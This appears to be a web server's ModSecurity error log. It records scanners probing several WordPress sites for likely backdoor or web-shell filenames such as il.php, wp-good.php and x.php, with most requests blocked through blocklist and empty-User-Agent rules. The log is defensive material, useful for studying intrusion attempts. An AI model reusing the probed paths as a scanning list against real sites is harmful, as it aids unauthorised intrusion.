[Tue May 26 13:11:32.473470 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:44933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVOrOvOeft4ltnLrH4v-AAAAH0"]
[Tue May 26 13:11:32.473568 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:44933] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVOrOvOeft4ltnLrH4v-AAAAH0"]
[Tue May 26 13:11:32.616633 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:40664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/info.php"] [unique_id "ahVOrOvOeft4ltnLrH4v_QAAAHM"]
[Tue May 26 13:11:32.616746 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:40664] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/info.php"] [unique_id "ahVOrOvOeft4ltnLrH4v_QAAAHM"]
[Tue May 26 13:11:32.764366 2026] [security2:error] [pid 496740:tid 496933] [client 20.151.117.104:37145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/a.php"] [unique_id "ahVOrOvOeft4ltnLrH4wAwAAAD8"]
[Tue May 26 13:11:32.764474 2026] [security2:error] [pid 496740:tid 496933] [client 20.151.117.104:37145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/a.php"] [unique_id "ahVOrOvOeft4ltnLrH4wAwAAAD8"]
[Tue May 26 13:11:32.907333 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:37156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/chosen.php"] [unique_id "ahVOrOvOeft4ltnLrH4wCAAAAC4"]
[Tue May 26 13:11:32.907432 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:37156] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/chosen.php"] [unique_id "ahVOrOvOeft4ltnLrH4wCAAAAC4"]
[Tue May 26 13:11:33.050074 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:16178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/index.php"] [unique_id "ahVOrevOeft4ltnLrH4wCQAAABQ"]
[Tue May 26 13:11:33.050207 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:16178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/index.php"] [unique_id "ahVOrevOeft4ltnLrH4wCQAAABQ"]
[Tue May 26 13:11:33.120767 2026] [security2:error] [pid 496740:tid 496889] [client 114.119.150.190:43547] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahVOrevOeft4ltnLrH4wFAAAABM"], referer: http://bhavisharchitects.com/
[Tue May 26 13:11:33.200290 2026] [security2:error] [pid 496740:tid 496894] [client 20.151.117.104:42062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOrevOeft4ltnLrH4wGAAAABg"]
[Tue May 26 13:11:33.272539 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:42062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wap.php"] [unique_id "ahVOrevOeft4ltnLrH4wGgAAAGY"]
[Tue May 26 13:11:33.272696 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:42062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wap.php"] [unique_id "ahVOrevOeft4ltnLrH4wGgAAAGY"]
[Tue May 26 13:11:33.416001 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:12005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp.php"] [unique_id "ahVOrevOeft4ltnLrH4wHgAAAAw"]
[Tue May 26 13:11:33.416146 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:12005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp.php"] [unique_id "ahVOrevOeft4ltnLrH4wHgAAAAw"]
[Tue May 26 13:11:33.559893 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:54407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/aa.php"] [unique_id "ahVOrevOeft4ltnLrH4wJAAAADk"]
[Tue May 26 13:11:33.559993 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:54407] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/aa.php"] [unique_id "ahVOrevOeft4ltnLrH4wJAAAADk"]
[Tue May 26 13:11:33.645667 2026] [security2:error] [pid 496740:tid 496911] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOrevOeft4ltnLrH4wFwAAACk"]
[Tue May 26 13:11:33.702988 2026] [security2:error] [pid 496740:tid 496904] [client 20.151.117.104:35556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/bolt.php"] [unique_id "ahVOrevOeft4ltnLrH4wLQAAACI"]
[Tue May 26 13:11:33.703128 2026] [security2:error] [pid 496740:tid 496904] [client 20.151.117.104:35556] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/bolt.php"] [unique_id "ahVOrevOeft4ltnLrH4wLQAAACI"]
[Tue May 26 13:11:33.851293 2026] [security2:error] [pid 496740:tid 496964] [client 20.151.117.104:16160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/bthil.php"] [unique_id "ahVOrevOeft4ltnLrH4wNAAAAF4"]
[Tue May 26 13:11:33.851390 2026] [security2:error] [pid 496740:tid 496964] [client 20.151.117.104:16160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/bthil.php"] [unique_id "ahVOrevOeft4ltnLrH4wNAAAAF4"]
[Tue May 26 13:11:34.012698 2026] [cgid:error] [pid 496740:tid 496956] [client 20.151.117.104:6696] AH01265: stderr from /home2/svijakqj/grandconclaveindia.org.in/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:11:34.013358 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:6696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/403.html"] [unique_id "ahVOrevOeft4ltnLrH4wPAAAAFY"]
[Tue May 26 13:11:34.087588 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:6696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/x.php"] [unique_id "ahVOruvOeft4ltnLrH4wQAAAAFQ"]
[Tue May 26 13:11:34.087719 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:6696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/x.php"] [unique_id "ahVOruvOeft4ltnLrH4wQAAAAFQ"]
[Tue May 26 13:11:34.230646 2026] [security2:error] [pid 496740:tid 496971] [client 20.151.117.104:37150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index/function.php"] [unique_id "ahVOruvOeft4ltnLrH4wRAAAAGU"]
[Tue May 26 13:11:34.230789 2026] [security2:error] [pid 496740:tid 496971] [client 20.151.117.104:37150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/index/function.php"] [unique_id "ahVOruvOeft4ltnLrH4wRAAAAGU"]
[Tue May 26 13:11:34.373783 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:5467] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/aaa.php"] [unique_id "ahVOruvOeft4ltnLrH4wRgAAAC4"]
[Tue May 26 13:11:34.373869 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:5467] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/aaa.php"] [unique_id "ahVOruvOeft4ltnLrH4wRgAAAC4"]
[Tue May 26 13:11:34.518057 2026] [security2:error] [pid 496740:tid 496910] [client 20.151.117.104:27692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/abcd.php"] [unique_id "ahVOruvOeft4ltnLrH4wSgAAACg"]
[Tue May 26 13:11:34.518194 2026] [security2:error] [pid 496740:tid 496910] [client 20.151.117.104:27692] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/abcd.php"] [unique_id "ahVOruvOeft4ltnLrH4wSgAAACg"]
[Tue May 26 13:11:34.661280 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:5449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-good.php"] [unique_id "ahVOruvOeft4ltnLrH4wVwAAADw"]
[Tue May 26 13:11:34.661384 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:5449] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-good.php"] [unique_id "ahVOruvOeft4ltnLrH4wVwAAADw"]
[Tue May 26 13:11:34.805723 2026] [security2:error] [pid 496740:tid 496996] [client 20.151.117.104:28923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/edit-tags.php"] [unique_id "ahVOruvOeft4ltnLrH4wWQAAAH4"]
[Tue May 26 13:11:34.805854 2026] [security2:error] [pid 496740:tid 496996] [client 20.151.117.104:28923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/edit-tags.php"] [unique_id "ahVOruvOeft4ltnLrH4wWQAAAH4"]
[Tue May 26 13:11:34.948080 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:27702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVOruvOeft4ltnLrH4wYAAAACU"]
[Tue May 26 13:11:34.948186 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:27702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVOruvOeft4ltnLrH4wYAAAACU"]
[Tue May 26 13:11:35.072714 2026] [security2:error] [pid 496740:tid 496777] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-comments-post.php"] [unique_id "ahVOr-vOeft4ltnLrH4wZAAAMiQ"]
[Tue May 26 13:11:35.090361 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:5462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/a7.php"] [unique_id "ahVOr-vOeft4ltnLrH4wZQAAAFE"]
[Tue May 26 13:11:35.090465 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:5462] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/a7.php"] [unique_id "ahVOr-vOeft4ltnLrH4wZQAAAFE"]
[Tue May 26 13:11:35.241202 2026] [security2:error] [pid 496740:tid 496923] [client 20.151.117.104:35554] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOr-vOeft4ltnLrH4wbAAAADU"]
[Tue May 26 13:11:35.246017 2026] [security2:error] [pid 496740:tid 496781] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-mail.php"] [unique_id "ahVOr-vOeft4ltnLrH4wbQAACyg"]
[Tue May 26 13:11:35.315952 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:35554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4wcgAAAH0"]
[Tue May 26 13:11:35.316119 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:35554] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4wcgAAAH0"]
[Tue May 26 13:11:35.419814 2026] [security2:error] [pid 496740:tid 496791] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-trackback.php"] [unique_id "ahVOr-vOeft4ltnLrH4wcwAAaDI"]
[Tue May 26 13:11:35.460185 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:27659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4wdAAAAFQ"]
[Tue May 26 13:11:35.460302 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:27659] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4wdAAAAFQ"]
[Tue May 26 13:11:35.593521 2026] [security2:error] [pid 496740:tid 496786] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-links-opml.php"] [unique_id "ahVOr-vOeft4ltnLrH4weAAAEC0"]
[Tue May 26 13:11:35.603433 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:35565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/NewFile.php"] [unique_id "ahVOr-vOeft4ltnLrH4weQAAAC0"]
[Tue May 26 13:11:35.603521 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:35565] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/NewFile.php"] [unique_id "ahVOr-vOeft4ltnLrH4weQAAAC0"]
[Tue May 26 13:11:35.745955 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:35543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-Blogs.php"] [unique_id "ahVOr-vOeft4ltnLrH4wgwAAAC4"]
[Tue May 26 13:11:35.746071 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:35543] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-Blogs.php"] [unique_id "ahVOr-vOeft4ltnLrH4wgwAAAC4"]
[Tue May 26 13:11:35.767324 2026] [security2:error] [pid 496740:tid 496788] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-blog-header.php"] [unique_id "ahVOr-vOeft4ltnLrH4whAAAKi8"]
[Tue May 26 13:11:35.893960 2026] [security2:error] [pid 496740:tid 496875] [client 20.151.117.104:6678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4whQAAAAU"]
[Tue May 26 13:11:35.894103 2026] [security2:error] [pid 496740:tid 496875] [client 20.151.117.104:6678] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4whQAAAAU"]
[Tue May 26 13:11:35.941141 2026] [security2:error] [pid 496740:tid 496855] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-load.php"] [unique_id "ahVOr-vOeft4ltnLrH4whgAAFHI"]
[Tue May 26 13:11:36.034222 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOr-vOeft4ltnLrH4wfwAAAFM"]
[Tue May 26 13:11:36.037245 2026] [security2:error] [pid 496740:tid 496959] [client 20.151.117.104:44990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/themes.php"] [unique_id "ahVOsOvOeft4ltnLrH4wigAAAFk"]
[Tue May 26 13:11:36.037389 2026] [security2:error] [pid 496740:tid 496959] [client 20.151.117.104:44990] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/themes.php"] [unique_id "ahVOsOvOeft4ltnLrH4wigAAAFk"]
[Tue May 26 13:11:36.114842 2026] [security2:error] [pid 496740:tid 496854] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-settings.php"] [unique_id "ahVOsOvOeft4ltnLrH4wjgAAdnE"]
[Tue May 26 13:11:36.188864 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:35578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOsOvOeft4ltnLrH4wlAAAAF0"]
